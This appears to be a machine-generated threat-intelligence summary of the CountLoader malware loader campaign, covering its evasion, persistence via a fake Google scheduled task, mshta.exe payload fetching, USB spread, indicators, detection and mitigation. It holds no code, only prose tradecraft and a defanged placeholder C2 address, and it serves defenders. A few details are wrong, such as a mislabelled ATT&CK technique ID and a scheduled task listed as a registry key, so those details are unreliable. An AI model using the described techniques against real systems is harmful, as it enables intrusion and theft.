Full Report
Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence
Analysis Summary
# Tool/Technique: CountLoader (Version 3.2)
## Overview
CountLoader is a modular and stealthy malware loader, recently observed in a new campaign utilizing cracked software distribution sites and YouTube videos as initial access vectors. Its primary purpose is to serve as the initial stage in a multistage attack chain, facilitating access, maintaining evasion, and delivering subsequent malware families, such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and the reported final-stage ACR Stealer.
## Technical Details
- Type: Malware family (Loader)
- Platform: Windows
- Capabilities: Modular execution, persistence establishment, host profiling, malware delivery (via executable, ZIP, DLL, MSI), defense evasion, and self-propagation via USB drives.
- First Seen: Detected in the wild since at least June 2025.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1192 - Drive-by Compromise (via distribution sites)
- TA0003 - Persistence
- T1547.001 - Registry Run Keys / Startup Folder (Likely related to persistence mechanism)
- T1053.005 - Scheduled Task/Job
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Encrypted ZIP, context-dependent execution)
- T1564.003 - Hidden Window (Implied by stealthy nature and use of `mshta.exe`)
- TA0011 - Command and Control
- T1071.001 - Application Layer Protocol: Web Protocols (Use of `mshta.exe` to reach C2)
- TA0002 - Execution
- T1204.002 - User Execution: Malicious File (User downloading and executing cracked software)
- T1218 - Signed Binary Proxy Execution (`mshta.exe`, `rundll32.exe`, `cmd.exe`)
## Functionality
### Core Capabilities
* **Initial Execution via Python Interpreter:** Deployed via a renamed legitimate Python interpreter ("Setup.exe") within archives downloaded from cracked software sites.
* **Remote Payload Retrieval:** Uses `mshta.exe` to retrieve the main CountLoader component from a remote server.
* **Multi-Stage Delivery:** Capable of downloading and executing various subsequent payloads, including executables, ZIP archives containing Python modules or EXEs, DLLs executed via `rundll32.exe`, or MSI installers.
* **Host Profiling:** Collects and exfiltrates extensive system information about the compromised host.
### Advanced Features
* **Evasion via Security Check:** Checks for the presence of CrowdStrike Falcon security software via WMI and alters its persistence command if detected.
* **Stealthy Persistence:** Establishes persistence using a scheduled task named to mimic Google ("GoogleTaskSystem136.0.7023.12"), set to run every 30 minutes for 10 years via `mshta.exe`.
* **Fileless Execution:** Supports executing a remote PowerShell payload directly in memory.
* **USB Propagation:** Capability to spread to other hosts via removable USB drives by creating malicious LNK files adjacent to original files, which execute the malware upon launch.
* **Signed Binary Abuse:** Heavily relies on signed binaries like `mshta.exe` and PowerShell for execution and C2 communication.
## Indicators of Compromise
*Note: Specific hashes, IPs, and domains were not mentioned in the text and must be derived from active analysis or external context.*
- File Hashes: [Not specified in the article]
- File Names: "Setup.exe" (renamed Python interpreter), Malicious ZIP archives, encrypted ZIP file, MS Word document.
- Registry Keys: Scheduled Task utilizing the name "GoogleTaskSystem136.0.7023.12".
- Network Indicators: Fallback domains and C2 servers used by `mshta.exe` to fetch payloads (defanged: example connection to `hxxp://c2-server-name[.]com`).
- Behavioral Indicators: Execution chain involving file extraction, modification of a scheduled task to run every 30 minutes for a decade, WMI query to check for CrowdStrike, and subsequent execution of `mshta.exe` or PowerShell.
## Associated Threat Actors
- The campaign is associated with the deployment of **ACR Stealer** as a final payload.
- The broader context suggests association with threat groups utilizing loaders like CountLoader, previously linked to Russian ransomware operations (based on earlier documentation referenced).
## Detection Methods
- Signature-based detection: Signatures targeting the specific dropped filenames or the known structure of the CountLoader payload.
- Behavioral detection: Monitoring the creation of scheduled tasks with long runtimes (10 years) or suspicious names (e.g., mimicking legitimate services). Detection of WMI queries querying antivirus process lists.
- YARA rules: Rules targeting unique strings or compilation artifacts within the CountLoader binary or its derived first-stage components.
## Mitigation Strategies
- Prevention measures: Block access to known malicious file-sharing or cracked software distribution websites. Filter or sandbox execution from high-risk file types like ZIP archives containing executables.
- Hardening recommendations: Implement application control solutions to restrict the execution of scripts via utilities like `mshta.exe` or PowerShell unless necessary for approved applications. Disable execution of scripts from removable media. Employ robust EDR solutions capable of detecting signed binary proxy execution chains and WMI-based reconnaissance.
## Related Tools/Techniques
- GachiLoader: Another malware loader mentioned in the article, distributed via a separate "YouTube Ghost Network" and written in Node.js.
- ACR Stealer: The final-stage information stealer delivered by this CountLoader campaign.
- Previous CountLoader Operations: Previous variants distributed malware like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner.